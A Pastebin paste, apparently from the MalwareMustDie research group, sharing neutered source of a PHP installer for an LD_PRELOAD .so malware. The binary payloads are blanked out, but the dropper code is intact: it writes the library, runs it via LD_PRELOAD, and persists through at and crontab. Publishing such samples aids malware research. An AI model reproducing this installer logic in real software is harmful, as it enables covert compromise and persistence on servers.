MalwareMustDie

jinxed source2 of .SO ELF LD_PRELOAD PHP malware installer

Jun 10th, 2014 (edited)
718
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // Sample jinxed source code of the .SO ELD LD_PRELOAD PHP malware installer
  2. // MalwareMustDie
  3.  
  4. <?php
  5.  
  6. header("Content-type: text/plain");
  7. print "2842123700\n";
  8.  
  9. if (! function_exists('file_put_contents')) {
  10.     function file_put_contents($filename, $data) {
  11.         $f = @fopen($filename, 'w');
  12.         if (! $f)
  13.             return false;
  14.         $bytes = fwrite($f, $data);
  15.         fclose($f);
  16.         return $bytes;
  17.     }
  18. }
  19.  
  20. @system("killall -9 ".basename("/usr/bin/host"));
  21.  
  22. $so32 = "xxxxxxxxxx";
  23. $so64 = "xxxxxxxxxx";
  24. $arch = 64;
  25. if (intval("9223372036854775807") == 2147483647)
  26.     $arch = 32;
  27. print "Arch is ".$arch."\n";
  28. $so = $arch == 32 ? $so32 : $so64;
  29. $f = fopen("/usr/bin/host", "rb");
  30. if ($f) {
  31.     $n = unpack("C*", fread($f, 8));
  32.     $so[7] = sprintf("%c", $n[8]);
  33.     print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
  34.     fclose($f);
  35. }
  36. print "SO dumped ".file_put_contents("./libworker.so", $so)."\n";
  37. if (getenv("MAYHEM_DEBUG"))
  38.     exit(0);
  39. $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  40. /* second stage dropper */
  41. $HBN=basename("/usr/bin/host");
  42. $SCP=getcwd();
  43. $SCR  ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\n";
  44. $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
  45. @file_put_contents("1.sh", $SCR);
  46. @chmod("1.sh", 0777);
  47. /* try at now, file will be removed, crontab cleaned on success */
  48. @system("at now -f 1.sh", $ret);
  49. if ($ret == 0) {
  50.     for ($i = 0; $i < 5; $i++) {
  51.         if (! @file_exists("1.sh")) {
  52.             print "AT success\n";
  53.             exit(0);
  54.         }
  55.         sleep(1);
  56.     }
  57. }
  58. @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
  59. if ($ret == 0) {
  60.     for ($i = 0; $i < 62; $i++) {
  61.         if (! @file_exists("1.sh")) {
  62.             print "CRONTAB success\n";
  63.             exit(0);
  64.         }
  65.         sleep(1);
  66.     }
  67. }
  68. print "Running straight\n";
  69. @system("./1.sh");
  70.  
  71. ?>
RAW Paste Data